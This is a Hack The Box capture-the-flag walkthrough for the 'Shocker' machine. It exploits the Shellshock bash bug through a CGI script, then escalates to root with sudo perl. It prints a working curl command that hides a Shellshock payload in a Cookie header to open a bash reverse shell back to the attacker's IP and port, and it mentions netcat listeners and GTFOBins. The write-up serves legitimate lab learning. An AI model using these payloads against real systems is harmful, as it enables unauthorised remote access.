Shocker — HTB Walkthrough
Shellshock Vulnerability : WIKI : Known as the “Bash Bug” or “ShellShock,” the GNU Bash Remote Code Execution Vulnerability (CVE-2014–6271) could allow an attacker to gain control over a targeted computer if exploited successfully. The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix.
ENUMERATION
Visiting website we see — — 80 HTTP Enum
I did all kinds of fuzzing and gobuster scan. But everything shown 4xx code. Even every list I used for gobuster scan shows cgi-bin but could not parse through it, because it shown 4xx error. But this could be interesting after all.
So I ran a gobuster scan against http://10.10.10.56/cgi-bin/
I know this is a guesswork because cgi-bin was giving 4xx, but you see after I did everything , including udp port enumeration and using shocker.py from github and everything. This needed to be given a check for sure.
You can use curl to send request
curl -H ‘Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.14/1234 0>&1’ http://10.10.10.56/cgi-bin/user.sh
I made use of shocker.py from github to execute commands
Opened netcat on my machine at port 1234. And tried executing reverse shell command
On my machine I see it gives error : bash not found. This means this user has no access to bash. Let’s try python reverse shell
So finally I did this
Again since python wasn’t there we could not spawn shell using python. So first I collected user.txt flag, going to home directory of shelly, and then I ran /bin/bash -i < interactive bash> to spawn the shell
PRIVILEGE ESCALATION
Doing sudo -l shows , shelly can execute perl script as root
Great we will exploit it using native exploit, open GTFOBins to make it easier for you and see sudo perl command to spawn shell
ROOTED !!!
